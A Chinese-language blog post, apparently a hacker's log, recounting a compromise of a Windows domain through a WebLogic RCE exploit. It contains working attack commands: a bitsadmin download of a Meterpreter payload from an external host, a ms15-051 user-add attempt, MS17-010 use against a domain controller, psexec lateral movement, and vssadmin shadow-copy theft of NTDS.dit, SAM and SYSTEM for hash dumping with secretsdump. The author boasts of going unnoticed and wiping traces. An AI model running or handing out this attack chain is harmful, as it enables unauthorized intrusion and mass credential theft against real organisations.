Weblogic引发的血案-3

2018-04-13 11:33:39 53 6912 1
直接用WebLogic_Wls-Wsat_RCE_Exp.jar exp获取到shell,和上上篇文章一样。
信息收集
hostname -->BX1
systeminfo -->Windows Server 2012 R2 Standard 169补丁
ipconfig -->192.168.2.23
whoami & net localgroup administrators -->得知当前用户属于管理员组,同时不确定管理员组里帐号(kx\kxadmin)是不是域管
tasklist -->WRSA.exe Webroot杀软(一开始没注意到这线程,以为没杀软,绕了点弯路)
所属域 -->Kx

攻击
像开始说的,我是没有注意到WRSA.exe这款杀软,但是习惯性的用了Veil生成msf的exp,恰好又能过(virustotal.com)

利用bitsadmin命令将exp上传到目标机
bitsadmin /transfer n http://xxx.xxx.xxx/xxx.exe C:\xxx\xxx.exe

msf监听并反弹meterpreter的shell

这里和 Weblogic引发的血案-2有点像,哈哈哈,入口点都一样。
域信息收集
先收集一下域信息,找找域管,找找域控。
net group 查看组名
net group "domain admins" /domain 查看域管理员
nltest /dclist:kx 查看域控
C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>net group "Domain Admins" /domain
net group "Domain Admins" /domain
The request will be processed at a domain controller for domain Kx.
Members
-------------------------------------------------------------------------------
xxxx                  Administrator            xxxx
kxadmin                  xxxx                xxxx

C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>nltest /dclist:Kx
nltest /dclist:Kx
Get list of DCs in domain 'Kx' from '\\AD1.Kx'.
    AD1.Kx [PDC]  [DS] Site: Default-First-Site-Name
    AD2.Kx        [DS] Site: Default-First-Site-Name
    AD3.Kx        [DS] Site: Default-First-Site-Name

说明:xxxx代表的是马赛克
利用ping命令得到域控IP
AD1.Kx -->192.168.2.225 域控
AD2.Kx -->192.168.2.215 域控
AD3.Kx -->192.168.2.245 域控
该机子的管理员组可能存在有域管账号,如果能抓出哈希岂不是美滋滋?但是当前权限不是NT AUTHORITY\SYSTEM所以msf加载的mimikatz是抓不出哈希的
C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>net localgroup administrators
Members
-------------------------------------------------------------------------------
Administrator
Kx\xxxx
Kx\xxxx
Kx\kxadmin(可能是域管账号)
说明:这里不能说Administrator用户为域管,因为本机默认有个adminstrator,域控默认也有1个,但这两个并不是同一个。
提权啊
迷惑点
综合上述,这里有个问题就是判断域管的时候留下的,就是执行net localgroup administrators显示有kx\kxadmin管理员用户,然后执行net group "domain admins" /domain查看域管当中也有kxadmin用户,这是kx\kxadmin迷惑了我(kx是域控),注意这个账号的格式是域控\账号,这里和远程登入域机器的时候输入域管账号一样,格式也是域控\账号。所以这里的kx\kxadmin账号是域管的概率很大,因为它标识了。总的来说,验证的方法也很简单,就是读取kx\kxadmin的密码,能登入域控的话就是域管账号了。
提权失败
好久没有提权了,记得上次用pr.exe提了台机子还是半年前的事。
Windows-Exploit-Suggester(提权辅助工具)
在目标价执行systeminfo>1.txt,然后将1.txt拖回本地
python windows-exploit-suggester.py --database 2018-04-10-mssb.xls --systeminfo 1.txt

这里只截取了一小部分的图,绿色代表可以利用的提权工具,[参考文章](http://www.freebuf.com/sectool/102139.html)
ms15-051
运行ms15-051.exe结果懵逼了
C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>ms15-051.exe "net user admin1 Qqaazz7
41/add"
ms15-051.exe "net user admin1 Qqaazz741/add"

C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>dir

Directory of C:\Oracle\Middleware\user_projects\domains\bifoundation_domain

04/12/2018  06:43 AM    <DIR>          .
04/12/2018  06:43 AM    <DIR>          ..
11/10/2017  09:34 AM               144 edit.lok
07/23/2016  08:17 PM               506 fileRealm.properties
07/23/2016  08:17 PM    <DIR>          init-info

emmmmm运行完之后,提权工具没了?!
当时第一反应就是被杀了,再一次看了进程才发现有个WRSA.exe杀软,好吧,第一次遇到,没注意。

Webroot杀软

手上也没有免杀的提权工具,这就很难受了。
meterpreter
用msf自带的试试,search了几个15 16的提权模块,设置session之后 run!然而并没有用,meterpreter迁移进程和getsystem也不管用,提权难啊提权难
内网游游
还在为提权想办法时,扫内网发现了192.168.2.245域控存在ms17-010!这次你还不死。

添加用户怼!

远程登入

迫不得已的时候才用这招,当时登入的时候还被挤下线了,好采对方没发觉什么。
mimiktaz

不是明文的,cmd5可破。
Cobalt Strike
利用该域控上线个cs然后arp登入一波域内机子就差不多完事了,但是死活上线不了,各种姿势都试过了,就是不给你上线,exp在进程里面了就是不给你上线(能通外网),刚开始以为是该域控环境有问题,所以就拿着域管登入到其他两个域控,还是不给上线,行吧,我在换多几台试试总可以了吧?换了不下十台机子,就是不给你上线,好气。最后以为是自己的Cobalt Strike有问题,本地运行下exp结果秒上线,狗噢。
MSF
都说Cobalt Strike是msf的界面版,那我改用msf总行吧。
添加msf路由,使得msf能访问到目标内网,[参考文章](https://www.anquanke.com/post/id/86505)

登入域里的机器,使用到的模块
use exploit/windows/smb/psexec
设置对应的SMBDomain,SMBUer,SMBPass,run登入。结果三台域控没上线,只上线了两台,当时忘截图了,心累。
NTDS.dit文件
获取NTDS.dit文件,导出域控里全部域用户哈希。导出方式[参考文章](http://www.mottoin.com/90278.html)
C:\Windows\System32>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'c:\'
    Shadow Copy ID: {b1a1be28-c02a-4402-bf80-f82b46673b03}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4

C:\Windows\System32>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Contents of shadow copy set ID: {56512710-bc51-4ba7-98cc-4d1c5d7b75ae}
   Contained 1 shadow copies at creation time: 4/12/2018 2:07:02 AM
      Shadow Copy ID: {b1a1be28-c02a-4402-bf80-f82b46673b03}
         Original Volume: (C:)\\?\Volume{aececd34-32d8-4d4f-9dc6-184ea98a825f}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4
         Originating Machine: AD3.Kx
         Service Machine: AD3.Kx
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential


C:\Windows\System32>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\NTDS.dit c:\
        1 file(s) copied.

C:\Windows\System32>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\system c:\
        1 file(s) copied.

C:\Windows\System32>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\sam c:\
        1 file(s) copied.
将NTDS.dit,system,sam 三个文件拖回kali里,DUMP NTDS.dit文件[参考文章](http://www.freebuf.com/articles/system/151463.html)
python secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/SYSTEM LOCAL
说明:这里一定要在/root/下创建ntds_cracking目录然后将ntds.dit放到该目录,路径是/root/ntds_cracking/ntds.dit 不然会报错。

老规矩,擦屁股走人~
TCV=1
个人博客:http://hone.cool

关于作者

评论53次

要评论?请先  登录  或  注册